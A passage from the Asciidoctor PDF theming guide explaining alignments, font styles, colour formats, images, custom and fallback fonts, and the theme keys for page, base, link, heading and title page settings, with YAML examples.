left\n\n=== Alignments\n\nThe align subkey is used to align text and images within the parent container.\n\n==== Text Alignments\n\nText can be aligned as follows:\n\n* left\n* center\n* right\n* justify (stretched to each edge)\n\n==== Image Alignments\n\nImages can be aligned as follows:\n\n* left\n* center\n* right\n\n=== Font Styles\n\nIn most cases, wherever you can specify a custom font family, you can also specify a font style.\nThese two settings are combined to locate the font to use.\n\nThe following font styles are recognized:\n\n* normal (no style)\n* italic\n* bold\n* bold_italic\n\n=== Text Transforms\n\nIn many places where font properties can be specified, a case transformation can also be applied to the text.\nThe following transforms are recognized:\n\n* uppercase\n* lowercase\n* none (clears an inherited value)\n\n[CAUTION#transform-unicode-letters]\n====\nSince Ruby 2.4, Ruby has built-in support for transforming the case of any letter defined by Unicode.\n\nIf you're using Ruby < 2.4, and the text you want to transform contains characters beyond the Basic Latin character set (e.g., an accented character), you must install either the `activesupport` or the `unicode` gem in order for those characters to be transformed.\n\n $ gem install activesupport\n\nor\n\n $ gem install unicode\n====\n\n\/\/ Additional transforms, such as capitalize, may be added in the future.\n\n=== Colors\n\nThe theme language supports color values in four formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`, optional surrounding quotes or both.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\nTransparent:: The special value `transparent` indicates that a color should not be used.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`), optional surrounding quotes or both.\n\nTo align with CSS, you may add a `+#+` in front of the hex color value.\nA YAML preprocessor is used to ensure the value is not treated as a comment, as would normally be the case in YAML.\n\nYou may also put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\nIn this case, the leading `+#+` on a hex value is entirely optional.\n\nRegardless, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.\n\nThe following are all equivalent values for the color red:\n\n[cols=\"8*m\"]\n|===\n|#ff0000\n|#FF0000\n|'ff0000'\n|'FF0000'\n|#f00\n|#F00\n|'f00'\n|'F00'\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: #ff0000\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how an RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 to 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string 
internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [0, 0.99, 1, 0]\n----\n\n==== Transparent\n\nIt's possible to specify no color by assigning the special value `transparent`, as shown here:\n\n[source,yaml]\n----\nbase:\n background_color: transparent\n----\n\n=== Images\n\nAn image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.\nImages are currently resolved relative to the value of the `pdf-stylesdir` attribute.\n\nThe following image types (and corresponding file extensions) are supported:\n\n* PNG (.png)\n* JPEG (.jpg)\n* SVG (.svg)\n\nCAUTION: The GIF format (.gif) is not supported.\n\nHere's how an image is specified in the theme file as a bare image path:\n\n[source,yaml]\n----\ntitle_page:\n background_image: title-cover.png\n----\n\nIn this case, the image is resolved relative to the theme directory.\n\nHere's how the image is specified using the inline image macro:\n\n[source,yaml]\n----\ntitle_page:\n background_image: image:title-cover.png[]\n----\n\nIn this case, the image is resolved relative to the value of the `imagesdir` attribute.\nWrapping the value in the image macro sends a hint to the converter to resolve it just like other images.\n\nLike in the AsciiDoc syntax, the inline image macro allows you to set the width of the image and the alignment:\n\n[source,yaml]\n----\ntitle_page:\n logo_image: image:logo.png[width=250,align=center]\n----\n\n=== Quoted String\n\nSome of the keys accept a quoted string as text content.\nThe final segment of these keys is always named `content`.\n\nA content key accepts a string value.\nIt's usually best to quote the string or use the http:\/\/symfony.com\/doc\/current\/components\/yaml\/yaml_format.html#strings[YAML multi-line string syntax].\n\nText content may be formatted using a subset of inline HTML.\nYou can use the well-known elements such as `<strong>`, `<em>`, `<code>`, `<a>`, `<sub>`, `<sup>`, `<del>`, and `<span>`.\nThe `<span>` element supports the `style` attribute, which you can use to specify the `color`, `font-weight`, and `font-style` CSS properties.\nYou can also use the `rgb` attribute on the `<color>` element to change the color or the `name` and `size` attributes on the `<font>` element to change the font properties.\nIf you need to add an underline or strikethrough decoration to the text, you can assign `underline` or `line-through` to the `class` attribute on any aforementioned element.\n\nHere's an example of using formatting in the content of the menu caret:\n\n[source,yaml]\n----\nmenu_caret_content: \" <font size=\\\"1.15em\\\"><color rgb=\\\"#b12146\\\">\\u203a<\/color><\/font> \"\n----\n\nNOTE: The string must be double quoted in order to use a Unicode escape code like `\\u203a`.\n\nAdditionally, normal substitutions are applied to the value of content keys for <<Running Content (Header & Footer),running content>>, so you can use most AsciiDoc inline formatting (e.g., `+*strong*+` or `+{attribute-name}+`) in the values of those keys.\n\n
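To round out the example above, here's a hypothetical variation of the menu caret that achieves a similar result using the `<span>` element with CSS-style properties instead of the `<font>` and `<color>` elements:\n\n[source,yaml]\n----\nmenu_caret_content: \" <span style=\\\"color: #b12146\\\">\\u203a<\/span> \"\n----\n\n== Fonts\n\nYou can select from <<built-in-afm-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare 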
them in your theme file.\n\nIMPORTANT: Asciidoctor has no trouble working with Unicode.\nIn fact, it prefers Unicode and considers the entire range.\nHowever, once you convert to PDF, you have to meet the font requirements of PDF in order to preserve Unicode characters.\nThere's nothing Asciidoctor can do to convince PDF to work with extended characters without the right fonts in play.\n\n=== Built-In (AFM) Fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[width=33.33%]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font_family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font_family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters you can use in your document are limited to the characters in the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc.).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\n\nCAUTION: Built-in fonts do not use the <<fallback-fonts,fallback fonts>>.\nIn order for the fallback font to kick in, you must be using a TrueType font.\n\n.WINANSI Encoding Behavior\n****\nWhen using the built-in PDF (AFM) fonts on a block of content in your AsciiDoc document, any character that cannot be encoded to WINANSI is replaced with a logical \"`not`\" glyph (`¬`) and you'll see the following warning in your console:\n\n The following text could not be fully converted to the Windows-1252 character set:\n | <string with unknown glyph>\n\nThis behavior differs from the default behavior in Prawn, which simply crashes.\n\nYou'll often see this warning if you're using callouts in your document and you haven't specified a TrueType font in your theme.\nTo prevent this warning, you need to specify a TrueType font.\n\nFor more information about how Prawn handles character encodings for built-in fonts, see https:\/\/github.com\/prawnpdf\/prawn\/blob\/master\/CHANGELOG.md#vastly-improved-handling-of-encodings-for-pdf-built-in-afm-fonts[this note in the Prawn CHANGELOG].\n****\n\n=== Bundled Fonts\n\nAsciidoctor PDF bundles several fonts that are used by the default theme.\nYou can also use these fonts in your custom theme by simply declaring them.\nThese fonts provide more characters than the built-in PDF fonts, but still only a subset of Unicode (to reduce the size of the gem).\n\nThe family names of the fonts bundled with Asciidoctor PDF are as follows:\n\nhttp:\/\/www.google.com\/get\/noto\/#\/family\/noto-serif[Noto Serif]::\nA serif font that can be styled as normal, italic, bold or bold_italic.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1mn[M+ 1mn]::\nA monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.\nAlso provides the circled numbers used in callouts.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1p[M+ 1p Fallback]::\nA sans-serif font that provides a very complete set of Unicode glyphs.\nCannot be styled as italic, bold or bold_italic.\nUsed as the fallback 
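font.\n\nFor instance, to use Noto Serif in your own theme, redeclare it in the <<Custom Fonts,font catalog>>.\nThe following sketch assumes the file names used by the default theme; check the _data\/fonts_ directory of the gem for the exact names:\n\n[source,yaml]\n----\nfont:\n catalog:\n Noto Serif:\n # file names below are assumptions based on the default theme\n normal: notoserif-regular-subset.ttf\n italic: notoserif-italic-subset.ttf\n bold: notoserif-bold-subset.ttf\n bold_italic: notoserif-bold_italic-subset.ttf\n----\n\n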
CAUTION: At the time of this writing, you cannot use the bundled fonts if you change the value of the `pdf-fontsdir` attribute (and thus define your own custom fonts).\nThis limitation may be lifted in the future.\n\n=== Custom Fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, you need to find a TTF file collection for the font you want to use.\nA collection typically consists of all four styles of a font:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font dynamically like a browser can, so you need the italic style._\n\nOnce you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nName the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key that you assign to the font in the font catalog anywhere the `font_family` property is accepted in the theme file.\nFor instance, to use the Roboto font for all headings, you'd use:\n\n[source,yaml]\n----\nheading:\n font_family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nWhen Asciidoctor PDF creates the PDF, it only embeds the glyphs from the font that are needed to render the characters present in the document.\nIn other words, Asciidoctor PDF automatically subsets the font.\nHowever, if you're storing the fonts in a repository, you may want to subset the font (for instance, by using FontForge) to reduce the space the font occupies in that storage.\nThis is simply a personal preference.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n Roboto Light:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\nTIP: Text in SVGs will use the font catalog from your theme.\nWe recommend that you match the font key to the name of the font seen by the operating system.\nThis will allow you to use the same font names (aka families) in both your graphics program and Asciidoctor PDF.\n\n=== Fallback Fonts\n\nIf a TrueType font is missing a character needed to render the document, 
such as a special symbol, you can have Asciidoctor PDF look for the character in a fallback font.\nYou only need to specify a single fallback font, typically one that provides a full set of symbols.\n\nIMPORTANT: The fallback font is only used when the primary font is a TrueType font (i.e., TTF, DFont, TTC).\nAny glyph missing from an AFM font is simply replaced with the \"`not`\" glyph (`¬`).\n\nCAUTION: Using the fallback font slows down PDF generation slightly because it has to analyze every single character.\nIts use is not recommended for large documents.\nInstead, it's best to select primary fonts that have all the characters you need.\nKeep in mind that the default theme currently uses a fallback font, though this may change in the future.\n\nAs with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/github.com\/android\/platform_frameworks_base\/blob\/master\/data\/fonts\/DroidSansFallback.ttf[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, add the key name to the `fallbacks` key under the `font_catalog` key.\nThe `fallbacks` key accepts an array of values, meaning you can specify more than one fallback font.\nHowever, we recommend using a single fallback font, if possible, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks:\n - DroidSansFallback\n----\n\nTIP: If you are using more than one fallback font, add additional lines to the `fallbacks` key.\n\nOf course, make sure you've configured your theme to use your custom font:\n\n[source,yaml]\n----\nbase:\n font_family: Roboto\n----\n\nThat's it!\nNow you're covered.\nIf your custom font is missing a glyph, Asciidoctor PDF will look in your fallback font.\nYou don't need to reference the fallback font anywhere else in your theme file.\n\n== Keys\n\nThis section lists all the keys that are available when creating a custom theme.\nThe keys are organized by category.\nEach category represents a common prefix under which the keys are typically nested.\n\nTIP: Keys can be nested wherever an underscore (`_`) appears in the name.\nThis nested structure is for organizational purposes only.\nAll keys are flattened when the theme is loaded (e.g., `align` nested under `base` becomes `base_align`).\n\nThe converter uses the values of these keys to control how most elements are arranged and styled in the PDF.\nThe default values listed in this section are inherited from the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/base-theme.yml[base theme].\n\nIMPORTANT: The https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default theme] has a different set of values which are not shown in this guide.\n\nWhen creating a theme, all keys are optional.\nRequired keys are provided by the base theme.\nTherefore, you 
only have to declare keys that you want to override.\n\n[#keys-page]\n=== Page\n\nThe keys in this category control the size, margins and background of each page (i.e., canvas).\nWe recommend that you define this category before all other categories.\n\nNOTE: The background of the title page can be styled independently.\nSee <<Title Page>> for details.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-page]*Key Prefix:* <<key-prefix-page,page>>\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: #ffffff)\n|page:\n background_color: #fefefe\n\n|background_image^[1]^\n|Inline image macro^[2]^ +\n(default: _not set_)\n|page:\n background_image: image:page-bg.png[]\n\n|layout\n|portrait {vbar} landscape +\n(default: portrait)\n|page:\n layout: landscape\n\n|margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 36)\n|page:\n margin: [0.5in, 0.67in, 1in, 0.67in]\n\n|margin_inner^[3]^\n|<<measurement-units,Measurement>> +\n(default: 48)\n|page:\n margin_inner: 0.75in\n\n|margin_outer^[3]^\n|<<measurement-units,Measurement>> +\n(default: 24)\n|page:\n margin_outer: 0.59in\n\n|size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width,height]>> +\n(default: A4)\n|page:\n size: Letter\n|===\n\n. Page background images are automatically scaled to fit within the bounds of the page.\n+\nNOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.\nThis limitation is due to a bug in Prawn 1.3.1.\nThe limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).\nFor more details, see http:\/\/discuss.asciidoctor.org\/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].\n. Target may be an absolute path or a path relative to the value of the `pdf-stylesdir` attribute.\n. 
The margins for `recto` (right-hand, odd-numbered) and `verso` (left-hand, even-numbered) pages are calculated automatically from the margin_inner and margin_outer values.\nThese margins are used when the value `prepress` is assigned to the `media` document attribute.\n\n[#keys-base]\n=== Base\n\nThe keys in this category provide generic theme settings and are often referenced throughout the theme file as variables.\nWe recommend that you define this category after the page category and before all other categories.\n\nNOTE: While it's common to define additional keys in this category (e.g., `base_border_radius`) to keep your theme DRY, we recommend using <<Custom Variables,custom variables>> instead.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-base]*Key Prefix:* <<key-prefix-base,base>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|base:\n align: justify\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|base:\n border_color: #eeeeee\n\n\/\/ border_radius is variable, not an official key\n\/\/|border_radius\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|base:\n border_width: 0.5\n\n|font_color\n|<<colors,Color>> +\n(default: #000000)\n|base:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: Helvetica)\n|base:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: 12)\n|base:\n font_size: 10.5\n\n\/\/ font_size_large is a variable, not an official key\n\/\/|font_size_large\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font_size_large: 13\n\n|font_size_min\n|<<values,Number>> +\n(default: 9)\n|base:\n font_size_min: 6\n\n\/\/ font_size_small is a variable, not an official key\n\/\/|font_size_small\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font_size_small: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: normal)\n|base:\n font_style: normal\n\n|text_transform^[1]^\n|none +\n(default: none)\n|base:\n text_transform: none\n\n|line_height_length^[2]^\n|<<values,Number>> +\n(default: 13.8)\n|base:\n line_height_length: 12\n\n|line_height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|base:\n line_height: >\n $base_line_height_length \/\n $base_font_size\n|===\n\n. The `text_transform` key cannot be set globally.\nTherefore, this key should not be used.\nThe value of `none` is implicit and is documented here for completeness.\n. 
You should set one of `line_height` or `line_height_length`, then derive the value of the other using a calculation, since the two values are correlated.\nFor instance, if you set `line_height_length`, then use `$base_line_height_length \/ $base_font_size` as the value of `line_height`.\n\n[#keys-vertical-spacing]\n=== Vertical Spacing\n\nThe keys in this category control the general spacing between elements where a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n|vertical_spacing\n|<<values,Number>> +\n(default: 12)\n|vertical_spacing: 10\n|===\n\n[#keys-link]\n=== Link\n\nThe keys in this category are used to style hyperlink text.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-link]*Key Prefix:* <<key-prefix-link,link>>\n\n|font_color\n|<<colors,Color>> +\n(default: #0000ee)\n|link:\n font_color: #428bca\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|link:\n font_family: Roboto\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|link:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|link:\n font_style: italic\n\n|text_decoration\n|none {vbar} underline {vbar} line-through +\n(default: none)\n|link:\n text_decoration: underline\n|===\n\n[#keys-literal]\n=== (Inline) Literal\n\nThe keys in this category are used for inline monospaced text in prose and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-literal]*Key Prefix:* <<key-prefix-literal,literal>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|literal:\n font_color: #b12146\n\n|font_family\n|<<fonts,Font family name>> +\n(default: Courier)\n|literal:\n font_family: M+ 1mn\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|literal:\n font_size: 12\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|literal:\n font_style: bold\n|===\n\n[#keys-heading]\n=== Heading\n\nThe keys in this category control the style of most headings, including part titles, chapter titles, section titles, the table of contents title and discrete headings.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-heading]*Key Prefix:* <<key-prefix-heading,heading>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $base_align)\n|heading:\n align: center\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|heading:\n font_color: #222222\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $base_font_family)\n|heading:\n font_family: Noto Serif\n\n\/\/ NOTE: heading_font_size is overridden by h<n>_font_size in base theme\n\/\/|font_size\n\/\/|<<values,Number>> +\n\/\/(default: $base_font_size)\n\/\/|heading:\n\/\/ font_size: 18\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|heading:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|heading:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.15)\n|heading:\n line_height: 1.2\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 4)\n|heading:\n margin_top: $vertical_spacing * 0.2\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|heading:\n margin_bottom: 9.6\n\n3+|[#key-prefix-heading-level]*Key Prefix:* <<key-prefix-heading-level,heading_h<n> >>^[1]^\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading_align)\n|heading:\n h2_align: center\n\n|font_color\n|<<colors,Color>> +\n(default: $heading_font_color)\n|heading:\n 
h2_font_color: [0, 99%, 100%, 0]\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $heading_font_family)\n|heading:\n h4_font_family: Roboto\n\n|font_size^[2]^\n|<<values,Number>> +\n(default: <1>=24; <2>=18; <3>=16; <4>=14; <5>=12; <6>=10)\n|heading:\n h6_font_size: $base_font_size * 1.7\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $heading_font_style)\n|heading:\n h3_font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $heading_text_transform)\n|heading:\n h2_text_transform: lowercase\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. A font size is assigned to each heading level by the base theme.\nIf you want the font size of a specific level to be inherited, you must assign the value `null` (or `~` for short).\n\n[#keys-title-page]\n=== Title Page\n\nThe keys in this category control the style of the title page as well as the arrangement and style of the elements on it.\n\nTIP: The title page can be disabled from the document by setting the `notitle` attribute in the AsciiDoc document header.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-title-page]*Key Prefix:* <<key-prefix-title-page,title_page>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|title_page:\n align: right\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n background_color: #eaeaea\n\n|background_image^[1]^\n|Inline image macro^[2]^ +\n(default: _not set_)\n|title_page:\n background_image: image:title.png[]\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|title_page:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.15)\n|title_page:\n line_height: 1\n\n3+|[#key-prefix-title-page-logo]*Key Prefix:* <<key-prefix-title-page-logo,title_page_logo>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: _inherit_)\n|title_page:\n logo:\n align: right\n\n|image\n|Inline image macro^[2]^ +\n(default: _not set_)\n|title_page:\n logo:\n image: image:logo.png[pdfwidth=25%]\n\n|top\n|Percentage^[3]^ +\n(default: 10%)\n|title_page:\n logo:\n top: 25%\n\n3+|[#key-prefix-title-page-title]*Key Prefix:* <<key-prefix-title-page-title,title_page_title>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n title:\n font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: 18)\n|title_page:\n title:\n font_size: $heading_h1_font_size\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n title:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n title:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: $heading_line_height)\n|title_page:\n title:\n line_height: 0.9\n\n|top\n|Percentage^[3]^ +\n(default: 40%)\n|title_page:\n title:\n top: 55%\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n title:\n 
margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n title:\n margin_bottom: 5\n\n3+|[#key-prefix-title-page-subtitle]*Key Prefix:* <<key-prefix-title-page-subtitle,title_page_subtitle>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: 14)\n|title_page:\n subtitle:\n font_size: $heading_h3_font_size\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: $heading_line_height)\n|title_page:\n subtitle:\n line_height: 1\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n subtitle:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n subtitle:\n margin_bottom: 5\n\n3+|[#key-prefix-authors]*Key Prefix:* <<key-prefix-authors,title_page_authors>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title_page:\n authors:\n delimiter: '; '\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n authors:\n text_transform: uppercase\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 12)\n|title_page:\n authors:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n authors:\n margin_bottom: 5\n\n3+|[#key-prefix-revision]*Key Prefix:* <<key-prefix-revision,title_page_revision>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title_page:\n revision:\n delimiter: ': '\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_size: $base_font_size_small\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n revision:\n text_transform: uppercase\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n revision:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n revision:\n margin_bottom: 5\n|===\n\n. 
